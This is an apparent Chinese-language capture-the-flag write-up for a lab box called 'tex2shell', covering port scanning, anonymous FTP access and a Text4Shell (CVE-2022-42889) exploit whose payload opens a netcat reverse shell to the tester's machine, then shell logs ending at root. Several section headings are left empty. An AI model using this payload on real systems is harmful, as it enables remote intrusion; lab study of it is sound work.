tex2shell

题目描述

难度：描述：前置条件：

基本信息

🚀	本地机器信息	目标机器信息
IP	10.17.5.121	10.10.216.153
OS	kali	linux

信息搜集

端口扫描


PORT     STATE SERVICE    REASON
21/tcp   open  ftp        syn-ack
22/tcp   open  ssh        syn-ack
80/tcp   open  http       syn-ack
8080/tcp open  http-proxy syn-ack

路径枚举

http://10.10.216.153/dev/secret.txt

From Testing Department
Hello developers netcat can't execute commands on server you can use traditional netcat commands

信息发现

└─$ ftp 10.10.216.153
Connected to 10.10.216.153.
220 (vsFTPd 3.0.5)
Name (10.10.216.153:leo): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||41942|)
150 Here comes the directory listing.
-rw-r--r--    1 65534    65534          33 Aug 07 17:54 msg.txt
226 Directory send OK.
ftp> get msg.txt
local: msg.txt remote: msg.txt
229 Entering Extended Passive Mode (|||9215|)
150 Opening BINARY mode data connection for msg.txt (33 bytes).
100% |*******************************************************************************************************|    33        7.47 KiB/s    00:00 ETA
226 Transfer complete.
33 bytes received in 00:00 (0.11 KiB/s)
ftp> exit
221 Goodbye.

┌──(leo㉿HACK)-[~/SecLab]
└─$ cat msg.txt
Hello Hackers Welcome in pWnbox.

漏洞发现

XSS

漏洞利用

Java Spring 里面里面的javascript rce?

webshell

payload

Text4shell（CVE-2022-42889）

{script:javascript:java.lang.Runtime.getRuntime().exec('nc.traditional -v $target_IP $target_PORT -e /bin/bash ')

${script:javascript:java.lang.Runtime.getRuntime().exec('nc.traditional 10.17.5.121 4443 -e /bin/bash')}

usershell

└─$ rlwrap nc -lvnp 4443
Listening on 0.0.0.0 4443
Connection received on 10.10.216.153 42288
ls
bin
boot
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
swap.img
sys
tmp
usr
var
id
uid=1000(pwnboy) gid=1000(pwnboy) groups=1000(pwnboy),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),117(lxd)
python3 -c 'import pty; pty.spawn("/bin/bash")'
pwnboy@pwnbox:/$ ls
ls
bin   dev  home  lib32  libx32      media  opt   root  sbin  srv       sys  usr
boot  etc  lib   lib64  lost+found  mnt    proc  run   snap  swap.img  tmp  var
pwnboy@pwnbox:/$ whoami
whoami
pwnboy

rootshell

# id
id
uid=0(root) gid=0(root) groups=0(root)

题目描述

基本信息

信息搜集

端口扫描

路径枚举

信息发现

漏洞发现

漏洞利用

webshell

usershell

rootshell

知识点回顾

总结